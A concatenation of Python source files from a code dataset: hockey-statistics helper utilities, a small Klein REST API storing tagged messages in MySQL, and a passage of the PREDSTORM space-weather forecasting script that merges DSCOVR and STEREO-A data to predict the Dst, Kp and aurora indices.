match_shot_resutl_id=2, timestamp=12, coordinate_x=12, coordinate_y=12, real_date='real_date_12', polygon='polygon_12', zone='zone_12')\n Shot.objects.create(shot_id=13, player_id=1, team_id=1, match_id=1, match_shot_resutl_id=3, timestamp=13, coordinate_x=13, coordinate_y=13, real_date='real_date_13', polygon='polygon_13', zone='zone_13')\n Shot.objects.create(shot_id=14, player_id=1, team_id=1, match_id=1, match_shot_resutl_id=4, timestamp=14, coordinate_x=14, coordinate_y=14, real_date='real_date_14', polygon='polygon_14', zone='zone_14')\n Shot.objects.create(shot_id=21, player_id=2, team_id=2, match_id=1, match_shot_resutl_id=1, timestamp=21, coordinate_x=21, coordinate_y=21, real_date='real_date_21', polygon='polygon_21', zone='zone_21')\n Shot.objects.create(shot_id=22, player_id=2, team_id=2, match_id=1, match_shot_resutl_id=2, timestamp=22, coordinate_x=22, coordinate_y=22, real_date='real_date_22', polygon='polygon_22', zone='zone_22')\n Shot.objects.create(shot_id=23, player_id=2, team_id=2, match_id=1, match_shot_resutl_id=3, timestamp=23, coordinate_x=23, coordinate_y=23, real_date='real_date_23', polygon='polygon_23', zone='zone_23')\n Shot.objects.create(shot_id=24, player_id=2, team_id=2, match_id=1, match_shot_resutl_id=4, timestamp=24, coordinate_x=24, coordinate_y=24, real_date='real_date_24', 
polygon='polygon_24', zone='zone_24')\n\ndef mobile_check(logger, request):\n \"\"\" mobile check \"\"\"\n logger.debug('mobile_check()')\n if hasattr(request, 'GET') and 'mobile' in request.GET:\n if request.GET['mobile'].lower() == 'true':\n mobile = True\n else:\n mobile = False\n else:\n mobile = False\n logger.debug('mobile_check() ended with: {0}'.format(mobile))\n return mobile\n\ndef logger_setup(debug):\n \"\"\" setup logger \"\"\"\n if debug:\n log_mode = logging.DEBUG\n else:\n log_mode = logging.INFO\n\n # log_formet = '%(message)s'\n log_format = '%(asctime)s - hockey_graphs - %(levelname)s - %(message)s'\n logging.basicConfig(\n format=log_format,\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n level=log_mode)\n logger = logging.getLogger('hockey_graph')\n return logger\n\ndef uts_now():\n \"\"\" return unixtimestamp in utc \"\"\"\n return calendar.timegm(datetime.utcnow().utctimetuple())\n\ndef uts_to_date_utc(uts, tformat='%Y-%m-%dT%H:%M:%SZ', tz='UTC'):\n \"\"\" convert unix timestamp to date format \"\"\"\n return datetime.fromtimestamp(int(uts), tz=pytz.timezone(tz)).strftime(tformat)\n\ndef date_to_uts_utc(date_human, _tformat='%Y-%m-%dT%H:%M:%S'):\n \"\"\" convert date to unix timestamp \"\"\"\n if isinstance(date_human, datetime):\n # we already got an datetime object as input\n result = calendar.timegm(date_human.timetuple())\n else:\n result = int(calendar.timegm(parse(date_human).timetuple()))\n return result\n\ndef date_to_datestr(date, tformat='%Y-%m-%dT%H:%M:%SZ'):\n \"\"\" convert dateobj to datestring \"\"\"\n try:\n result = date.strftime(tformat)\n except BaseException:\n result = None\n return result\n\ndef datestr_to_date(datestr, tformat='%Y-%m-%dT%H:%M:%S'):\n \"\"\" convert datestr to dateobj \"\"\"\n try:\n result = datetime.strptime(datestr, tformat)\n except BaseException:\n result = None\n return result\n\ndef list2dic(_logger, input_list, pkey=None):\n \"\"\" convert a list to a dicitionary \"\"\"\n # logger.debug('list2dic({0})'.format(pkey))\n output_dict = {}\n if pkey:\n for ele in input_list:\n output_dict[ele[pkey]] = ele\n return output_dict\n\ndef maxval_get(input_list, sorter='timestamp', divisor=60, add=1):\n \"\"\" look for a matchvalue form a sorted list \"\"\"\n try:\n x_max = math.ceil(sorted(input_list, key=lambda x: x[sorter])[-1][sorter]/divisor) + add\n except BaseException:\n x_max = divisor + 1\n return x_max\n\ndef pctg_float_get(part, base, decimal=2):\n \"\"\" calculate pcts and return float \"\"\"\n try:\n if base != 0:\n pctg_value = round(part*100/base, decimal)\n else:\n pctg_value = 0\n except BaseException:\n pctg_value = 0\n\n return pctg_value\n\ndef pctg_get(part, base):\n \"\"\" calculate percentage value and return ans string \"\"\"\n # catch division by zero exceptions\n try:\n if base != 0:\n pctg_value = '{0}%'.format(round(part*100/base, 0))\n else:\n pctg_value = '0%'\n except BaseException:\n pctg_value = '0%'\n\n return pctg_value\n\ndef min2sec(sec_value):\n \"\"\" convert seconds to mm:ss \"\"\"\n try:\n (min_, sec) = divmod(sec_value, 60)\n min_value = '{:02d}:{:02d}'.format(min_, sec)\n except BaseException:\n min_value = None\n\n return min_value\n\ndef list_sumup(logger, input_list, filter_values, reverse=False):\n \"\"\" sum up list of dictionaries based on input \"\"\"\n logger.debug('list_sumup()')\n\n match_list = []\n _tmp_sum = {}\n for ele in filter_values:\n _tmp_sum[ele] = 0\n\n if reverse:\n input_list = list(reversed(input_list))\n\n for match in input_list:\n _tmp_dic = {}\n for ele in filter_values:\n 
_tmp_dic[ele] = match[ele]\n _tmp_sum[ele] += match[ele]\n _tmp_dic['sum_{0}'.format(ele)] = _tmp_sum[ele]\n\n match_list.append(_tmp_dic)\n\n if reverse:\n match_list = list(reversed(match_list))\n\n return match_list\n\ndef shot_leaffan_sync(shot, ltime, ldate):\n \"\"\" keep shot sync with leaffan.net \"\"\"\n #(mday, _time) = shot['real_date'].split(' ', 2)\n #if ltime <= shot['timestamp']:\n # # usually seonds in match should always increase.. if not - this is a mistake and hould be skippt\n # ltime = shot['timestamp']\n # ldate = mday\n # process_shot = True\n #elif abs(ltime - shot['timestamp']) < 300:\n # # consider in game corrections\n # process_shot = True\n # # ldate = mday\n #elif ldate == mday:\n # # consider corrections on same date but outside of match\n process_shot = True\n #else:\n # process_shot = False\n\n return (process_shot, ltime, ldate)\n\ndef deviation_avg_get(logger, input_list, value_list=None):\n \"\"\" add standard deviation \"\"\"\n logger.debug('_deviation_add()')\n _tmp_lake = {}\n for value in value_list:\n _tmp_lake[value] = []\n\n # compile lists\n for ele in input_list:\n for value in value_list:\n if value in ele:\n _tmp_lake[value].append(ele[value])\n\n # calculate deviation\n deviation_dic = {}\n for value in _tmp_lake:\n if _tmp_lake[value]:\n deviation_dic[value] = {'std_deviation': float(round(np.std(_tmp_lake[value]), 2)), 'average': float(round(np.mean(_tmp_lake[value]), 2)), 'min': float(np.amin(_tmp_lake[value])), 'max': float(np.amax(_tmp_lake[value]))}\n\n return deviation_dic\n\ndef highlowabs_get(logger, input_list):\n \"\"\" get highest and lowest value from list \"\"\"\n\n (min_, max_) = highlow_get(logger, input_list)\n absval = 0\n if abs(min_) <= abs(max_):\n absval = abs(max_)\n else:\n absval = abs(min_)\n return absval\n\ndef highlow_get(logger, input_list):\n \"\"\" get highest and lowest value from list \"\"\"\n\n try:\n min_ = min(input_list)\n max_ = max(input_list)\n except BaseException:\n # cornercase handling for list of dictionaires (eg. 
highchart series)\n min_ = 0\n max_ = 0\n for ele in input_list:\n # process integers\n if isinstance(ele, int):\n if ele < min_:\n min_ = ele\n if ele > max_:\n max_ = ele\n # process dictionaries (highchart series)\n elif isinstance(ele, dict):\n for parameter in ['x', 'y']:\n if parameter in ele:\n if ele[parameter] < min_:\n min_ = ele[parameter]\n if ele[parameter] > max_:\n max_ = ele[parameter]\n return (min_, max_)\n\ndef minmax_get(minval, maxval, average):\n \"\"\" define min/max based on avarage \"\"\"\n\n minabs = round(abs(maxval - average), 0)\n maxabs = round(abs(minval - average), 0)\n\n if maxabs > minabs:\n newmin = average - maxabs\n newmax = average + maxabs\n else:\n newmin = average - minabs\n newmax = average + minabs\n\n return (newmin, newmax)\n\ndef language_get(logger, request):\n \"\"\" lang check \"\"\"\n logger.debug('language_get()')\n\n if hasattr(request, 'GET') and 'language' in request.GET:\n try:\n language = request.GET['language'].lower()\n except BaseException:\n language = 'en'\n else:\n language = 'en'\n\n logger.debug('language_get() ended with: {0}'.format(language))\n return language\n\ndef period_get(value, vtype='min'):\n \"\"\" get period from value \"\"\"\n if vtype == 'min':\n if value <= 20:\n period = 1\n elif value <= 40:\n period = 2\n elif value <= 60:\n period = 3\n else:\n period = 4\n elif vtype == 'sec':\n period = math.ceil(value/1200)\n\n return period\n\ndef sliding_window(logger, in_list, size=5):\n \"\"\" implement forward and backward sliding window for a list of elements \"\"\"\n logger.debug('sliding_window()')\n\n backward_list = []\n forward_list = []\n for idx, current in enumerate(range(len(in_list)), start=0-size):\n # print(idx, current)\n if idx < 0:\n idx = 0\n backward_list.append(in_list[idx:current+1])\n forward_list.append(in_list[current:current+size])\n\n return (backward_list, forward_list)\n\ndef path_check_create(logger, path):\n \"\"\" check save path - create if does not exist \"\"\"\n logger.debug('path_check({0})'.format(path))\n pathlib.Path(path).mkdir(parents=True, exist_ok=True)\n\ndef periodseconds_get(logger, period, tst_end):\n \"\"\" get start/end value for a period \"\"\"\n logger.debug('periodseconds_get({0})'.format(period))\n\n if period == 5:\n start_val = 0\n end_val = tst_end\n elif period == 4:\n start_val = 3600000\n end_val = 3900000\n else:\n start_val = (period - 1) * 1200000\n end_val = period * 1200000\n\n return (start_val, end_val)\n\ndef random_file_pick(logger, path):\n \"\"\" pick random file from directory \"\"\"\n logger.debug('random_file_pick({0})'.format(path))\n file = random.choice(os.listdir(path))\n print(file)\n\ndef bg_image_select(logger, bg_image_list):\n \"\"\" bg image selection \"\"\"\n logger.debug('bg_image_select()')\n if bg_image_list:\n logger.debug('_bg_image_select(): pick team specific background image')\n file_name = 'img/backgrounds/{0}'.format(random.choice(bg_image_list))\n else:\n # generate random background image\n file_name = 'img/backgrounds/{0}.png'.format(random.randint(1,7))\n\n return file_name\n\ndef position_get(logger, position):\n \"\"\" get position \"\"\"\n\n position_dic = {\n 'GK': 'GK',\n 'FO': 'FO',\n 'CE': 'FO',\n 'LW': 'FO',\n 'RW': 'FO',\n 'LD': 'DE',\n 'RD': 'DE',\n 'DE': 'DE'\n }\n\n if position in position_dic:\n result = position_dic[position]\n else:\n result = 'UNK'\n\n return result\n\ndef region_get(logger, country):\n \"\"\" get region GER/NAM/OTHER \"\"\"\n region_dic = {\n 'GER': 'GER',\n 'CAN':'NAM',\n 'USA': 'NAM'\n 
}\n\n if country not in region_dic:\n result = 'Others'\n else:\n result = region_dic[country]\n\n return result","repo_name":"grindsa/hockey_graphs","sub_path":"rest/functions/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":15100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26558443202","text":"import config\nfrom helper import rest_api_json, get_json_arg\nfrom error import Unauthorized\n\nimport uuid\nfrom datetime import datetime\nfrom klein import run, route\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.sql import text\nfrom twisted.python import log\n\n\ndb_path = 'mysql://{}:{}@{}/{}'.format(config.db_user, config.db_pass,\n config.db_host, config.db_name)\nengine = create_engine(db_path, execution_options={'autocommit': True})\ndb_connection = engine.connect()\n\n\n@route('/v1/messages', methods=['POST'])\n@rest_api_json\ndef messages(json):\n user_id = get_json_arg(json, 'user_id')\n message = get_json_arg(json, 'message')\n\n log.msg('Inserting message for user '+user_id)\n\n # check for message length\n if len(message) > config.message_size_limit:\n raise MethodNotAllowed('Message size bigger than limit '+config.message_size_limit)\n\n # extract tags\n tags = {tag.strip(\"#\") for tag in message.split() if tag.startswith(\"#\")}\n log.msg('Found tags: '+str(tags))\n\n\n with db_connection.begin() as db_trans:\n\n # check if user exist\n if db_connection.execute(text('SELECT id FROM users WHERE id = :id'),id=user_id).fetchone() is None:\n raise Unauthorized('User not authorized')\n\n # insert message\n message_id = uuid.uuid4()\n db_connection.execute(text('INSERT INTO messages (id, user_id, message_text, message_time) '\\\n 'VALUES (:message_id, :user_id, :message, CURRENT_TIMESTAMP(6))'),\n message_id=str(message_id), user_id=user_id, message=message)\n\n # insert tags\n for tag in tags:\n tag_id = uuid.uuid4()\n db_connection.execute(text('INSERT INTO tags (id, tag_name) '\\\n 'VALUES (:tag_id, :tag_name)'),\n tag_id=str(tag_id), tag_name=tag)\n\n db_connection.execute(text('INSERT INTO message_tag (message_id, tag_id) '\\\n 'VALUES (:message_id, :tag_id)'),\n message_id=str(message_id), tag_id=str(tag_id))\n\n\n return { 'status': 'ok', 'id': str(message_id) }\n\n\n@route('/v1/messages/tags', methods=['GET'])\n@rest_api_json\ndef tag(json):\n tag_name = get_json_arg(json, 'tag_name')\n\n if 'start_time' in json:\n start_time = get_json_arg(json, 'start_time')\n else:\n start_time = str(datetime.today())\n\n if 'offset' in json:\n offset = get_json_arg(json, 'offset')\n else:\n offset = 0\n\n if 'limit' in json:\n limit = get_json_arg(json, 'limit')\n else:\n limit = 20\n\n log.msg(start_time)\n log.msg(offset)\n log.msg(limit)\n\n result = db_connection.execute(text('SELECT users.user_name, messages.message_text, messages.message_time FROM messages '\\\n 'INNER JOIN message_tag ON message_tag.message_id = messages.id '\\\n 'INNER JOIN tags ON message_tag.tag_id = tags.id '\\\n 'INNER JOIN users ON messages.user_id = users.id '\\\n 'WHERE tags.tag_name = :tag_name '\\\n 'AND messages.message_time < :start_time '\\\n 'ORDER BY messages.message_time DESC '\\\n 'LIMIT :limit OFFSET :offset'),\n tag_name=tag_name, start_time=start_time, limit=limit, offset=offset).fetchall()\n\n log.msg(result)\n\n return [dict(r) for r in result]\n\n\n\nif __name__ == '__main__':\n run(config.bind_address, 
config.bind_port)\n","repo_name":"mmarzec/twistter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14730314303","text":"import os\nimport sys\nimport copy\nimport getopt\nimport shutil\n\n# Load config file\nimport configparser\nconfig = configparser.ConfigParser()\n\nmyopts, args = getopt.getopt(sys.argv[1:],\"hv=\", ['config=',\"server\", \"help\", \"historic=\", \"verbose=\",\n \"use3DCORE=\", \"validation\", \"force-stereoa\"])\nconfig_path = \"config.ini\"\nfor opt, arg in myopts:\n if opt == '--config': # Define path for config\n config_path = arg\n\nconfig.read(config_path)\n\n# READ INPUT OPTIONS FROM COMMAND LINE\nargv = sys.argv[1:]\n\nserver = False\nif \"--server\" in [o for o, v in myopts]:\n server = True\n print(\"In server mode!\")\n\nimport matplotlib\n#if server:\nmatplotlib.use('Agg') # important for server version, otherwise error when making figures\n#else:\n# matplotlib.use('Qt5Agg') # figures are shown on mac\n\nfrom datetime import datetime, timedelta\nimport h5py\nimport logging\nimport logging.config\nimport matplotlib.pyplot as plt\nfrom matplotlib.dates import num2date, date2num, DateFormatter\nimport numpy as np\nimport pdb\nimport pickle\nimport scipy.io\nimport seaborn as sns\nimport urllib\n\n# Local imports\nimport predstorm as ps\nfrom predstorm.config.constants import AU, dist_to_L1\nfrom predstorm.config import plotting as pltcfg\nfrom predstorm.plot import plot_solarwind_and_dst_prediction, plot_solarwind_science\nfrom predstorm.plot import plot_solarwind_pretty\nfrom predstorm.predict import dst_loss_function\n\n#========================================================================================\n#--------------------------------- MAIN SCRIPT ------------------------------------------\n#========================================================================================\n\ndef main():\n \"\"\"The main code.\"\"\"\n\n # General variables:\n tstr_format = \"%Y-%m-%dT%H%M\" #formerly \"%Y-%m-%d-%H_%M\"\n use_recurrence_model = False\n plot_past_days = float(config['RealTimePred']['PlotPastDays'])\n plot_future_days = float(config['RealTimePred']['PlotFutureDays'])\n save_future_days = float(config['RealTimePred']['SaveFutureDays'])\n data_src_future = config['RealTimePred']['FutureSource'].upper()\n if data_src_future == 'RECURRENCE':\n use_recurrence_model = True\n else:\n use_recurrence_model = False\n\n # Define timing variables:\n timenow = datetime.utcnow()\n if run_mode == 'normal':\n timestamp = timenow\n timestampstr = datetime.strftime(timestamp, tstr_format) # timeutcstr\n timenowstr = datetime.strftime(timenow, tstr_format)\n datestr = datetime.strftime(timenow, '%Y-%m-%d')\n use_realtime = (timenow - timestamp).days < (7.-plot_past_days)\n\n predstorm_header = ''\n predstorm_header += '\\n------------------------------------------------------------------------\\n'\n predstorm_header += '\\n'\n predstorm_header += 'PREDSTORM L5 v1 method for geomagnetic storm and aurora forecasting. 
\\n'\n predstorm_header += 'Created by Helio4Cast Group, Graz, last update September 2020.\\n'\n predstorm_header += '\\n'\n predstorm_header += 'Time shifting magnetic field and plasma data from STEREO-A, \\n'\n predstorm_header += 'or from an L5 mission or interplanetary CubeSats, to predict\\n'\n predstorm_header += 'the solar wind at Earth and the Dst index for magnetic storm strength.\\n'\n predstorm_header += '\\n'\n predstorm_header += '\\n'\n predstorm_header += '------------------------------------------------------------------------'\n logger.info(predstorm_header)\n logger.info(\"Starting PREDSTORM_L5 script. Running in mode {} with timestamp {}\".format(run_mode.upper(),\n timestampstr))\n\n #================================== (1) GET DATA ========================================\n\n logger.info(\"\\n-------------------------\\nDATA READS\\n-------------------------\")\n\n #------------------------ (1a) Get real-time DSCOVR data --------------------------------\n\n logger.info(\"(1) Getting L1 data...\")\n if use_realtime:\n # If recent, use real-time data:\n dism = ps.get_noaa_realtime_data()\n dism = dism.cut(endtime=timestamp)\n else:\n # If older timestamp, source from online archive:\n logger.info(\"Using archived DSCOVR data\")\n dism = ps.get_dscovr_data(starttime=timestamp-timedelta(days=plot_past_days+1),\n endtime=timestamp)\n time_last_rtsw = num2date(dism['time'][-1]).replace(tzinfo=None) # original timenow\n\n # Linearly interpolate over NaNs and resample to hourly data:\n dism.interp_nans()\n sw_past_min = dism\n sw_past = dism.make_hourly_data()\n\n logger.info('Current time (UTC):')\n logger.info('\\t{}'.format(timenow))\n logger.info('Time of last datapoint in NOAA real-time data (UTC):')\n logger.info('\\t{}'.format(time_last_rtsw))\n logger.info('Time lag in minutes: {:.0f}'.format(np.round((timenow-time_last_rtsw).seconds/60., 0)))\n\n #------------------------ (1b) Get real-time STEREO-A beacon data -----------------------\n\n logger.info(\"(2) Getting STEREO-A data...\")\n\n if not use_recurrence_model:\n # Estimate lag between STEREO-A measurements and Earth:\n lag_sta_L1, lag_sta_r = ps.get_time_lag_wrt_earth(timestamp=timestamp, satname='STEREO-A')\n est_timelag = lag_sta_L1 + lag_sta_r\n # Find the number of days to plot into future (reduces as ST-A comes closer):\n plot_future_days = min([est_timelag, plot_future_days])\n stereo_start = timestamp - timedelta(days=plot_future_days+7)\n logger.info(\"From STEREO-A position, plotting {:.1f} days in the past and {:.1f} days into the future.\".format(\n plot_past_days, plot_future_days))\n else:\n stereo_start = timestamp\n\n # Read data:\n try:\n stam = ps.get_stereo_beacon_data(starttime=stereo_start, endtime=timestamp+timedelta(minutes=1))\n if stam.h['PlasmaDataIntegrity'] == 0: # very low quality data\n if force_stereoa:\n logger.warning(\"STEREO-A data has low data quality but using data anyway.\")\n else:\n raise Exception(\"Very low STEREO-A data quality!\")\n if len(np.where(np.isnan(stam['speed']))[0]) > len(stam)/2:\n if force_stereoa:\n logger.warning(\"STEREO-A data is {:.1f}% nans but using data anyway.\".format(len(np.where(np.isnan(stam['speed']))[0])/len(stam)*100.))\n else:\n raise Exception(\"STEREO-A data is {:.1f}% nans!\".format(len(np.where(np.isnan(stam['speed']))[0])/len(stam)*100.))\n nan_periods = stam.find_nan_periods()\n stam = stam.interp_nans()\n stam.load_positions()\n sta_details = stam.return_position_details(timestamp)\n except Exception as e:\n logger.info(\"STEREO-A 
read failed for reason: {}\".format(e))\n use_recurrence_model = True\n\n # If reading STEREO-A failed, take day from 27-day recurrence model instead:\n if not os.path.exists(\"data\"):\n os.mkdir(\"data\")\n if run_mode == 'normal' and use_recurrence_model:\n logger.info(\"STEREO-A plasma data is missing/corrupted, using 27-day recurrence model for plasma data instead!\")\n rec_start = timestamp - timedelta(days=27)\n rec_end = timestamp - timedelta(days=27-save_future_days)\n pers27_path = os.path.join(inputpath, \"rtsw_min_last100days.h5\")\n sw_future_min = ps.get_rtsw_archive_data(pers27_path)\n tlast_recurrence = num2date(sw_future_min['time'][-1])\n logger.info(\"Data runs from {} to {}\".format(num2date(sw_future_min['time'][0]), tlast_recurrence))\n sw_future_min.cut(starttime=rec_start, endtime=rec_end)\n sw_future_min['time'] += 27. # correct by one Carrington rotation\n sw_future_min.h['DataSource'] += ' t+27days'\n sw_future_min.source += '+27days'\n shifted_nan_periods = sw_future_min.find_nan_periods()\n\n # Make sure last data point is after current date\n if len(sw_future_min['time']) == 0:\n raise Exception(\"The file rtsw_min_last100days.h5 foes not contain enough data for using recurrence!\")\n\n if not use_recurrence_model:\n time_last_sta = num2date(stam['time'][-1]).replace(tzinfo=None)\n logger.info('Time of last datapoint in STEREO-A data (UTC):')\n logger.info('\\t{}'.format(time_last_sta))\n logger.info('Time lag in minutes: {:.0f}'.format(np.round((timenow - time_last_sta).seconds/60., 0)))\n\n #------------------------- (1c) Load NOAA Dst for comparison ----------------------------\n\n logger.info(\"(3) Getting Kyoto Dst data...\")\n if use_realtime:\n dst = ps.get_noaa_dst()\n else:\n dst = ps.get_past_dst(filepath=\"dstarchive/WWW_dstae00010670.dat\",\n starttime=num2date(timestamp)-timedelta(days=plot_past_days+1),\n endtime=num2date(timestamp))\n if len(dst) == 0.:\n raise Exception(\"Kyoto Dst data for historic mode is missing! 
Go to http://wdc.kugi.kyoto-u.ac.jp/dstae/index.html\")\n dst = dst.cut(endtime=timestamp)\n\n #------------------------- (1d) Load 3DCORE output if available -------------------------\n\n if use3DCORE:\n logger.info(\"(4) Reading 3DCORE flux rope output...\")\n fr_t_m, fr_B_m, fr_t, fr_B = ps.get_3DCORE_output(path_3DCORE)\n else:\n fr_t_m = []\n\n #========================== (2) PREDICTION CALCULATIONS ==================================\n\n #------------------------ (2a) Corrections to time-shifted STEREO-A data ----------------\n\n if not use_recurrence_model:\n logger.info(\"\\n-------------------------\\nL5-to-L1 MAPPING\\n-------------------------\")\n logger.info(\"Applying corrections to STEREO-A data...\")\n\n logger.info(\"(1) Shift time at STEREO-A according to solar wind rotation\")\n stam.shift_time_to_L1()\n logger.info(\"STA-to-L1 adjusted time of last datapoint in STEREO-A:\")\n logger.info(\"\\t{}\".format(num2date(stam['time'][-1])))\n\n logger.info(\"(2) Make correction for difference in heliocentric distance\")\n stam.shift_wind_to_L1()\n\n logger.info(\"(3) Conversion from RTN to GSE and then to GSM as if STEREO was on Sun-Earth line\")\n stam['bx'], stam['by'], stam['bz'] = stam['br'], -stam['bt'], stam['bn'] # RTN to quasi-GSE\n stam.convert_GSE_to_GSM()\n sw_future = stam.make_hourly_data()\n sw_future_min = stam\n\n # Calculate shifts for NaN periods in STA data:\n shifted_nan_periods = {}\n for key in nan_periods:\n shifted_nan_periods[key] = []\n for times in nan_periods[key]:\n starttime, endtime = times\n lag_sta_L1, lag_sta_r = ps.get_time_lag_wrt_earth(timestamp=num2date(starttime), satname='STEREO-A')\n shifted_start = starttime + lag_sta_L1 + lag_sta_r\n lag_sta_L1, lag_sta_r = ps.get_time_lag_wrt_earth(timestamp=num2date(endtime), satname='STEREO-A')\n shifted_end = endtime + lag_sta_L1 + lag_sta_r\n shifted_nan_periods[key].append([shifted_start, shifted_end])\n\n else:\n # Assign 27-day recurrence L1 data variables to new keys:\n sw_future_min.vars += ['br', 'bt', 'bn']\n sw_future_min['br'], sw_future_min['bt'], sw_future_min['bn'] = sw_future_min['bx'], sw_future_min['by'], sw_future_min['bz']\n sw_future_min = sw_future_min.interp_nans()\n sw_future = sw_future_min.make_hourly_data()\n\n #-------------------------- (2b) Take flux rope data from 3DCORE ------------------------\n\n if use3DCORE:\n logger.info(\"(!) 
Filling prediction with flux rope values from 3DCORE\")\n # Interpolate minute values to match STEREO values:\n sw_f_times = sw_future_min['time'][np.logical_and(sw_future_min['time'] >= fr_t_m[0], sw_future_min['time'] <= fr_t_m[-1])]\n for ib, bn in enumerate(fr_B_m):\n fr_B_m[ib] = np.interp(sw_f_times, fr_t_m, fr_B_m[ib])\n # Minute:\n sw_future_min['bx'][np.logical_and(sw_future_min['time'] >= fr_t_m[0], sw_future_min['time'] <= fr_t_m[-1])] = fr_B_m[0]\n sw_future_min['by'][np.logical_and(sw_future_min['time'] >= fr_t_m[0], sw_future_min['time'] <= fr_t_m[-1])] = fr_B_m[1]\n sw_future_min['bz'][np.logical_and(sw_future_min['time'] >= fr_t_m[0], sw_future_min['time'] <= fr_t_m[-1])] = fr_B_m[2]\n sw_future_min['bn'][np.logical_and(sw_future_min['time'] >= fr_t_m[0], sw_future_min['time'] <= fr_t_m[-1])] = fr_B_m[2]\n # Hourly:\n sw_future['bx'][np.logical_and(sw_future['time'] >= fr_t[0], sw_future['time'] <= fr_t[-1])] = fr_B[0]\n sw_future['by'][np.logical_and(sw_future['time'] >= fr_t[0], sw_future['time'] <= fr_t[-1])] = fr_B[1]\n sw_future['bz'][np.logical_and(sw_future['time'] >= fr_t[0], sw_future['time'] <= fr_t[-1])] = fr_B[2]\n # Recalculate total B-field:\n sw_future_min['btot'] = np.sqrt(sw_future_min['bx']**2. + sw_future_min['by']**2. + sw_future_min['bz']**2.)\n sw_future['btot'] = np.sqrt(sw_future['bx']**2. + sw_future['by']**2. + sw_future['bz']**2.)\n\n #------------------- (2c) COMBINE DSCOVR and time-shifted L5/PERS data ------------------\n\n sw_merged = ps.merge_Data(sw_past, sw_future)\n try:\n sw_merged_min = ps.merge_Data(sw_past_min, sw_future_min)\n savemindata = True\n except:\n logger.warning(\"No minute data available.\")\n savemindata = False\n\n #---------------------- (2d) calculate Dst for combined data ----------------------------\n\n logger.info(\"\\n-------------------------\\nINDEX PREDICTIONS\\n-------------------------\")\n logger.info('Making index predictions for L1')\n\n # Predict Kp\n kp_newell = sw_merged.make_kp_prediction()\n # Predict Auroral Power\n aurora_power = sw_merged.make_aurora_power_prediction()\n # Calculate Newell coupling parameter\n newell_coupling = sw_merged.get_newell_coupling()\n\n dst_method = config['RealTimePred']['DstPredMethod']\n dst_offset = float(config['RealTimePred']['DstOffset'])\n dst_model_path = config['RealTimePred']['DstModelPath']\n\n # Predict Dst from L1 and STEREO-A:\n if dst_method == 'temerin_li':\n dst_pred = sw_merged.make_dst_prediction()\n dst_label = 'Dst Temerin & Li 2002'\n dst_pred['dst'] = dst_pred['dst'] + dst_offset\n elif dst_method == 'temerin_li_2006':\n dst_pred = sw_merged.make_dst_prediction(method='temerin_li_2006', t_correction=True)\n dst_label = 'Dst Temerin & Li 2006'\n dst_pred['dst'] = dst_pred['dst'] + dst_offset\n elif dst_method == 'obrien':\n dst_pred = sw_merged.make_dst_prediction(method='obrien')\n dst_label = 'Dst OBrien & McPherron 2000'\n dst_pred['dst'] = dst_pred['dst'] + dst_offset\n elif dst_method == 'burton':\n dst_pred = sw_merged.make_dst_prediction(method='burton')\n dst_label = 'Dst Burton et al. 
1975'\n dst_pred['dst'] = dst_pred['dst'] + dst_offset\n elif dst_method.startswith('ml'):\n with open(dst_model_path, 'rb') as f:\n model = pickle.load(f)\n dst_pred = sw_merged.make_dst_prediction_from_model(model)\n if dst_method == 'ml_dstdiff':\n dst_tl = sw_merged.make_dst_prediction(method='temerin_li_2006', t_correction=True)\n dst_pred['dst'] = dst_tl['dst'] + dst_pred['dst'] + dst_offset\n dst_label = 'Dst predicted using ML (GBR)'\n\n # Combine in data object:\n sw_merged['dst'] = dst_pred['dst']\n sw_merged['kp'] = kp_newell['kp']\n sw_merged['aurora'] = aurora_power['aurora']\n sw_merged['ec'] = newell_coupling['ec']\n\n #========================== (3) PLOT RESULTS ============================================\n\n # Make reduced copies to make plotting and min/max setting easier:\n sw_future_min_plot = copy.deepcopy(sw_future_min)\n sw_future_plot = copy.deepcopy(sw_future)\n plot_start = timestamp\n plot_end = timestamp + timedelta(save_future_days)\n sw_future_min_plot.cut(starttime=plot_start, endtime=plot_end)\n sw_future_plot.cut(starttime=plot_start, endtime=plot_end)\n\n # Archive paths\n savepath_archive_plt = os.path.join(savepath_archive, 'plots')\n savepath_archive_txt = os.path.join(savepath_archive, 'text')\n\n logger.info(\"\\n-------------------------\\nPLOTTING\\n-------------------------\")\n # ********************************************************************\n logger.info(\"Creating output plots...\")\n realtime_plot_path = os.path.join(savepath_rt,'predstorm_real.png')\n plot_solarwind_and_dst_prediction([sw_past_min, sw_past], [sw_future_min_plot, sw_future_plot], \n dst, dst_pred,\n newell_coupling=newell_coupling,\n past_days=plot_past_days,\n future_days=plot_future_days,\n dst_label=dst_label,\n timestamp=timestamp,\n times_3DCORE=fr_t_m,\n times_nans=shifted_nan_periods,\n plot_path=realtime_plot_path)\n plt.close()\n\n archive_plot_path = os.path.join(savepath_archive_plt,'predstorm_v1_realtime_{}.png'.format(\n datetime.strftime(timestamp, \"%Y-%m-%d\")))\n shutil.copyfile(realtime_plot_path, archive_plot_path)\n\n science_plot_path = os.path.join(savepath_rt,'predstorm_science.png')\n plot_solarwind_science([sw_past_min, sw_past], [sw_future_min, sw_future], \n timestamp=timestamp,\n past_days=plot_past_days,\n future_days=plot_future_days,\n plot_path=science_plot_path)\n\n try:\n pretty_plot_path = os.path.join(savepath_rt,'predstorm_pretty.png')\n plot_solarwind_pretty(sw_past, sw_future, dst_pred, newell_coupling, timestamp,\n plot_path=pretty_plot_path)\n except Exception as e:\n logger.warning(\"Could not run plot_solarwind_pretty() due to error: {}\".format(e))\n # ********************************************************************\n\n\n #========================== (4) WRITE OUT RESULTS AND VARIABLES =========================\n\n #-------------- (4a) Write prediction variables (plot) to pickle and txt ASCII file -----\n\n logger.info(\"\\n-------------------------\\nWRITING RESULTS\\n-------------------------\")\n\n # Realtime 1-hour data:\n ps.save_to_file(os.path.join(savepath_rt,'predstorm_real.txt'), wind=sw_merged, dst=dst_pred,\n kp=kp_newell, aurora=aurora_power, ec=newell_coupling)\n # Realtime 1-min data:\n if savemindata:\n ps.save_to_file(os.path.join(savepath_rt,'predstorm_real_1m.txt'), wind=sw_merged_min,\n dst=dst_pred.interp_to_time(sw_merged_min['time']),\n 